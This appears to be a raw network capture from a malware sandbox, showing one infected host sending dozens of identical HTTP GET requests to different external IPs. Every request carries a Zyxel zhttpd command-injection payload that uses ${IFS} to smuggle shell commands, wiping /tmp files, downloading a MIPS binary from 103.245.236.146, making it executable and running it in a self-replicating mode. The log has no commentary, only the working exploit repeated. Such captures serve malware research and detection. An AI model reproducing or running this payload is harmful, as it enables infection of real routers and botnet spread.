                                                Jan 28, 2024 10:16:14.642303944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1739192.168.2.2335636156.46.197.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642318964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1740192.168.2.2352846147.36.204.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642384052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1741192.168.2.235252853.27.2.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642402887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1742192.168.2.233892284.41.240.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642421961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1743192.168.2.2339678200.208.17.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642430067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1744192.168.2.234203896.112.60.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642508030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1745192.168.2.2337312122.68.163.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642508030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1746192.168.2.233870825.145.74.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642549038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1747192.168.2.234176451.44.202.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642558098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1748192.168.2.2344702223.176.188.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642576933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1749192.168.2.234874093.152.122.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642596006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1750192.168.2.234517092.149.245.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642632961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1751192.168.2.234917087.201.119.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642680883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1752192.168.2.2341324182.209.192.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642693996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1753192.168.2.234021678.130.180.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642745972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1754192.168.2.2348332110.32.74.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642770052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1755192.168.2.23477322.161.219.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642800093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1756192.168.2.23385105.22.169.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642821074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1757192.168.2.234562093.106.3.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642870903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1758192.168.2.2356872109.234.70.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642889023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1759192.168.2.2348798192.48.135.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642927885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1760192.168.2.2348522100.60.38.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642939091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1761192.168.2.2347336221.171.250.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642963886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1762192.168.2.234423462.121.40.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642986059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1763192.168.2.235970027.55.151.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643016100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1764192.168.2.2351056123.251.184.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643033981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1765192.168.2.234651253.146.162.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643078089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1766192.168.2.235620425.98.185.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643106937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1767192.168.2.2342322174.76.22.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643135071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1768192.168.2.2348534148.252.131.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643172979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1769192.168.2.2358254154.185.43.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643208981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1770192.168.2.2357312218.145.210.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643223047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1771192.168.2.2349360212.194.212.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643234015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1772192.168.2.2344132145.206.195.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643270969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1773192.168.2.235592625.162.39.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643300056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1774192.168.2.2354458180.173.72.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643337011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1775192.168.2.2343640148.109.44.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643670082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1776192.168.2.235193871.249.134.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643713951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1777192.168.2.2355676185.106.10.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643714905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1778192.168.2.2334182162.214.19.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643718004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1779192.168.2.236093624.155.125.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643740892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1780192.168.2.2350218169.245.206.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643757105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1781192.168.2.2334076177.249.93.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643810034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1782192.168.2.235777460.160.175.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643820047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1783192.168.2.2354226108.14.98.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643872023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1784192.168.2.2351784184.213.226.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643883944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1785192.168.2.234928862.75.66.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643898010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1786192.168.2.2355298172.6.19.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.643935919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1787192.168.2.233790412.48.245.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644004107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1788192.168.2.2338828180.90.42.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644005060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1789192.168.2.2342784121.25.67.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644028902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1790192.168.2.2341842143.86.147.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644058943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1791192.168.2.233853823.204.20.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644081116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1792192.168.2.233490037.63.17.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644103050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1793192.168.2.2360280192.100.123.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644114017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1794192.168.2.2335596146.102.180.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644153118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1795192.168.2.235929066.174.93.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644182920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1796192.168.2.2348246163.199.22.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644232035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1797192.168.2.2336122206.10.25.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644259930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1798192.168.2.233688487.86.199.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644268036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1799192.168.2.234898465.192.185.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644279003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1800192.168.2.233691278.53.227.170443
                                                TimestampBytes transferredDirectionData
